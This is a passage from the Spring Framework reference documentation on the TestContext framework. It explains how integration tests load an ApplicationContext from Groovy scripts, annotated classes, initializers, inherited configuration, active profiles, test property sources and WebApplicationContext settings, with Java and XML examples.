if Groovy is on the classpath.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/AppConfig.groovy\" and\n\t\/\/ \"\/TestConfig.groovy\" in the root of the classpath\n\t**@ContextConfiguration({\"\/AppConfig.groovy\", \"\/TestConfig.groovy\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default Groovy script.\nSpecifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`\ndetect a default location based on the name of the test class. If your class is named\n`com.example.MyTest`, the Groovy context loader will load your application context from\n`\"classpath:com\/example\/MyTestContext.groovy\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTestContext.groovy\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Declaring XML config and Groovy scripts simultaneously\n[TIP]\n====\nBoth XML configuration files and Groovy scripts can be declared simultaneously via the\n`locations` or `value` attribute of `@ContextConfiguration`. 
If the path to a configured\nresource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;\notherwise it will be loaded using a `GroovyBeanDefinitionReader`.\n\nThe following listing demonstrates how to combine both in an integration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"\/app-config.xml\" and \"\/TestConfig.groovy\"\n\t@ContextConfiguration({ \"\/app-config.xml\", \"\/TestConfig.groovy\" })\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n====\n\n[[testcontext-ctx-management-javaconfig]]\n===== Context configuration with annotated classes\n\nTo load an `ApplicationContext` for your tests using __annotated classes__ (see\n<<beans-java>>), annotate your test class with `@ContextConfiguration` and configure the\n`classes` attribute with an array that contains references to annotated classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from AppConfig and TestConfig\n\t**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Annotated Classes\n[TIP]\n====\nThe term __annotated class__ can refer to any of the following.\n\n* A class annotated with `@Configuration`\n* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)\n* A JSR-330 compliant class that is annotated with `javax.inject` annotations\n* Any other class that contains `@Bean`-methods\n\nConsult the javadocs of `@Configuration` and `@Bean` for further information regarding\nthe configuration and semantics of __annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. 
In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. 
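The following minimal sketch illustrates the latter approach; the `MainConfig` class and\nthe imported resource location are hypothetical:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ entry point: a @Configuration class that imports XML configuration\n\t@Configuration\n\t@ImportResource(\"classpath:\/com\/example\/app-config.xml\")\n\tpublic class MainConfig {\n\t\t\/\/ @Bean methods...\n\t}\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from MainConfig,\n\t\/\/ including the beans defined in \"app-config.xml\"\n\t@ContextConfiguration(classes = MainConfig.class)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n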
Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. 
Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. 
This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. 
Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. 
The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. 
For further information, refer to the\ncorresponding javadocs.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden programmatically via a custom resolver\n\t@ActiveProfiles(\n\t\tresolver = OperatingSystemActiveProfilesResolver.class,\n\t\tinheritProfiles = false)\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service.test;\n\n\tpublic class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {\n\n\t\t@Override\n\t\tpublic String[] resolve(Class<?> testClass) {\n\t\t\tString profile = ...;\n\t\t\t\/\/ determine the value of profile based on the operating system\n\t\t\treturn new String[] {profile};\n\t\t}\n\t}\n----\n\n[[testcontext-ctx-management-property-sources]]\n===== Context configuration with test property sources\n\nSpring 3.1 introduced first-class support in the framework for the notion of an\nenvironment with a hierarchy of _property sources_, and since Spring 4.1 integration\ntests can be configured with test-specific property sources. In contrast to the\n`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`\nannotation can be declared on a test class to declare resource locations for test\nproperties files or _inlined_ properties. These test property sources will be added to\nthe set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded\nfor the annotated integration test.\n\n[NOTE]\n====\n`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`\nSPI, but `@TestPropertySource` is not supported with implementations of the older\n`ContextLoader` SPI.\n\nImplementations of `SmartContextLoader` gain access to merged test property source values\nvia the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in\n`MergedContextConfiguration`.\n====\n\n*Declaring test property sources*\n\nTest properties files can be configured via the `locations` or `value` attribute of\n`@TestPropertySource` as shown in the following example.\n\nBoth traditional and XML-based properties file formats are supported -- for example,\n`\"classpath:\/com\/example\/test.properties\"` or `\"file:\/\/\/path\/to\/file.xml\"`.\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"test.properties\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/test.xml\"`. A path which\nreferences a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will\nbe loaded using the specified resource protocol. Resource location wildcards (e.g.\n`**\/*.properties`) are not permitted: each location must evaluate to exactly one\n`.properties` or `.xml` resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n_Inlined_ properties in the form of key-value pairs can be configured via the\n`properties` attribute of `@TestPropertySource` as shown in the following example. 
All\nkey-value pairs will be added to the enclosing `Environment` as a single test\n`PropertySource` with the highest precedence.\n\nThe supported syntax for key-value pairs is the same as the syntax defined for entries in\na Java properties file:\n\n* `\"key=value\"`\n* `\"key:value\"`\n* `\"key value\"`\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(properties = {\"timezone = GMT\", \"port: 4242\"})\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Default properties file detection*\n\nIf `@TestPropertySource` is declared as an empty annotation (i.e., without explicit\nvalues for the `locations` or `properties` attributes), an attempt will be made to detect\na _default_ properties file relative to the class that declared the annotation. For\nexample, if the annotated test class is `com.example.MyTest`, the corresponding default\nproperties file is `\"classpath:com\/example\/MyTest.properties\"`. If the default cannot be\ndetected, an `IllegalStateException` will be thrown.\n\n*Precedence*\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nIn the following example, the `timezone` and `port` properties as well as any properties\ndefined in `\"\/test.properties\"` will override any properties of the same name that are\ndefined in system and application property sources. Furthermore, if the\n`\"\/test.properties\"` file defines entries for the `timezone` and `port` properties those\nwill be overridden by the _inlined_ properties declared via the `properties` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\n\t\tlocations = \"\/test.properties\",\n\t\tproperties = {\"timezone = GMT\", \"port: 4242\"}\n\t)\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Inheriting and overriding test property sources*\n\n`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`\nattributes that denote whether resource locations for properties files and inlined\nproperties declared by superclasses should be __inherited__. The default value for both\nflags is `true`. This means that a test class inherits the locations and inlined\nproperties declared by any superclasses. Specifically, the locations and inlined\nproperties for a test class are appended to the locations and inlined properties declared\nby superclasses. Thus, subclasses have the option of __extending__ the locations and\ninlined properties. Note that properties that appear later will __shadow__ (i.e.,\noverride) properties of the same name that appear earlier. 
In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class __shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. 
You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested 